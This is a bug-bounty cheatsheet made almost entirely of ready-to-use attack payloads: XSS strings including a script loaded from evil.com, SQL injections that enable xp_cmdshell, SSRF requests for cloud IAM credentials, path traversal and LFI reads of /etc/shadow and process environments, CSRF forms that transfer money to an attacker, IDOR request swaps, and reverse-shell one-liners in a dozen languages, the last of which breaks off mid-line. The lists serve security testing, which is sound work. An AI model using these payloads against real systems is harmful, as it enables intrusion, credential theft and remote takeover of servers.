Bug Bounty Cheatsheet

Cross-Site Scripting (XSS) allows attackers to execute scripts in a victim's browser. Test these payloads:

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
javascript:alert(1)
'><script>alert(String.fromCharCode(88,83,83))</script>
<iframe src=javascript:alert(1)>
<marquee onstart=alert(1)>
<script src="http://evil.com/xss.js"></script>
<body onload=alert(1)>
<a href="javascript:alert(1)">Click me</a>
<div onmouseover=alert(1)>Hover over me</div>
<input type="text" value="<script>alert(1)</script>">
<link rel="stylesheet" href="javascript:alert(1)">
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<table background="javascript:alert(1)">
<textarea></textarea><script>alert(1)</script>
<!--#exec cmd="/bin/echo 'alert(1)'"-->
<!--#exec cmd="echo 'alert(1)'"-->
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<object data="javascript:alert(1)"></object>
<bgsound src="javascript:alert(1)">
    

SQL Injection lets attackers execute arbitrary SQL commands. Common payloads:

' OR '1'='1
admin' --
' UNION SELECT username,password FROM users --
admin" or "1"="1
SELECT @@version
'; WAITFOR DELAY '0:0:5'--
" OR SLEEP(5) AND "1"="1
'; EXEC xp_cmdshell('whoami')--
' OR 'a'='a
' OR 'x'='x
' OR 1=1--
' OR 'x'='x' --
' OR 'x'='y
' OR ''='
' OR 1=1#
' OR 'test'='test
' OR 1=1;--
' OR 'x'='x';--
' OR 'a'='b
'; EXEC sp_addsrvrolemember 'sa', 'sysadmin'--
'; EXEC sp_configure 'show advanced options',1;--
'; EXEC sp_configure 'xp_cmdshell',1;--
    

SSRF allows attackers to make arbitrary requests. Test with these payloads:

http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data
file:///etc/passwd
dict://127.0.0.1
http://[email protected]
http://127.0.0.1#evil.com
http://[::1]
http://[::]
http://localhost:80
http://localhost:8080
http://127.0.0.1:80
http://127.0.0.1:8080
http://127.0.0.1:22
http://127.0.0.1:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/RoleName
http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2InstanceRole
http://169.254.169.254/latest/meta-data/iam/security-credentials/S3AccessRole
http://127.0.0.1/admin
    

Exploits access to restricted directories. Try these payloads:

../../etc/passwd
/../../../boot.ini
../../../../etc/hosts
..\..\..\windows\system.ini
../../../../../../etc/shadow
%2e%2e%2f
%252e%252e%252f
..;--[===
..%c0%af..%c0%af..%c0%af
..%c1%1c..%c1%1c..%c1%1c
..%c0%ae..%c0%ae..%c0%ae
..%c0%ae%c0%ae..%c0%ae%c0%ae
..%e0%80%af..%e0%80%af..%e0%80%af
..%e0%80%ae..%e0%80%ae..%e0%80%ae
..%c0%ae%c1%1c..%c0%ae%c1%1c
..%c0%ae%c1%9c..%c0%ae%c1%9c
..%c0%ae%c2%a0..%c0%ae%c2%a0
..%c0%ae%c2%ac..%c0%ae%c2%ac
..%c0%ae%c1%a0..%c0%ae%c1%a0
..%c0%ae%c2%a4..%c0%ae%c2%a4
    

Exploits user sessions by crafting requests:

<form action="http://victim.com" method="POST">
<input type="hidden" name="amount" value="5000">
<input type="submit">
</form>
<img src="http://victim.com/logout"/>
<script>fetch('/delete?post=123', {method: 'DELETE'})</script>
<form action="http://example.com/transfer" method="POST">
<input type="hidden" name="account" value="attacker">
<input type="hidden" name="amount" value="1000">
<input type="submit">
</form>
<img src="http://example.com/delete-account"/>
<form action="http://example.com/update-email" method="POST">
<input type="hidden" name="new_email" value="[email protected]">
<input type="submit">
</form>
<img src="http://example.com/change-password?new_pass=123456"/>
<form action="http://example.com/add-friend" method="POST">
<input type="hidden" name="friend_id" value="attacker">
<input type="submit">
</form>
<form action="http://example.com/send-money" method="POST">
<input type="hidden" name="recipient" value="attacker">
<input type="hidden" name="amount" value="1000">
<input type="submit">
</form>
<img src="http://example.com/close-account"/>
<form action="http://example.com/update-profile" method="POST">
<input type="hidden" name="name" value="attacker">
<input type="submit">
</form>
    

Exploits improper access control to sensitive data. Test with these patterns:

GET /account/12345 HTTP/1.1
Change to:
GET /account/67890 HTTP/1.1

POST /api/v1/users/12345/update
Alter "12345" to target other users:
POST /api/v1/users/67890/update

GET /orders/12345 HTTP/1.1
Change to:
GET /orders/67890 HTTP/1.1

DELETE /api/v1/users/12345
Change to:
DELETE /api/v1/users/67890

PATCH /api/v1/users/12345
Change to:
PATCH /api/v1/users/67890

PUT /api/v1/users/12345
Change to:
PUT /api/v1/users/67890

POST /api/v1/orders/12345/cancel
Change to:
POST /api/v1/orders/67890/cancel

DELETE /api/v1/orders/12345
Change to:
DELETE /api/v1/orders/67890

GET /files/12345
Change to:
GET /files/67890

POST /api/v1/files/12345/delete
Change to:
POST /api/v1/files/67890/delete

PATCH /api/v1/files/12345
Change to:
PATCH /api/v1/files/67890

PUT /api/v1/files/12345
Change to:
PUT /api/v1/files/67890
    

Local File Inclusion vulnerabilities allow attackers to include files on a server. Test with these payloads:

../../../../etc/passwd
../../../../etc/shadow
../../../../etc/hosts
../../../../etc/group
../../../../proc/self/environ
../../../../proc/self/cmdline
../../../../proc/self/status
../../../../proc/self/mounts
../../../../proc/self/smaps
../../../../proc/self/cgroup
../../../../proc/self/net/tcp
../../../../proc/self/net/tcp6
../../../../proc/self/net/udp
../../../../proc/self/net/udp6
../../../../proc/self/net/icmp
../../../../proc/self/net/arp
../../../../proc/self/net/route
../../../../proc/self/net/snmp
../../../../proc/self/net/wireless
../../../../proc/self/net/dev
    

Remote Code Execution vulnerabilities allow attackers to execute arbitrary code on a server. Test with these payloads:

; nc -e /bin/sh 127.0.0.1 1234
; bash -i >& /dev/tcp/127.0.0.1/1234 0>&1
; php -r '$sock=fsockopen("127.0.0.1",1234); exec("/bin/sh -i <&3 >&3 2>&3");'
; python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("127.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
; perl -e 'use Socket; $i="127.0.0.1"; $p=1234; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S");e xec("/bin/sh -i");};'
; ruby -rsocket -e'f=TCPSocket.open("127.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
; go run -e 'package main; import"os/exec"; func main(){cmd:=exec.Command("/bin/sh","-i"); cmd.Stdin=os.Stdin; cmd.Stdout=os.Stdout; cmd.Stderr=os.Stderr; cmd.Run();}'
; lua -e 'local s=require("socket"); local t=assert(s.tcp()); t:connect("127.0.0.1",1234); while true do local r,x=assert(t:receive("*l")); local f=assert(io.popen(r,"r")); local b=assert(f:read("*a")); t:send(b);end'
; node -e 'var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(1234, "127.0.0.1", function() { client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); });'
; powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("127.0.0.1",1234); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}
; awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/1234"; while(42) { do{ printf "> " |& s; s |& getline c; if(c) { while((c |& getline) > 0) print $0 |& s; close(c); }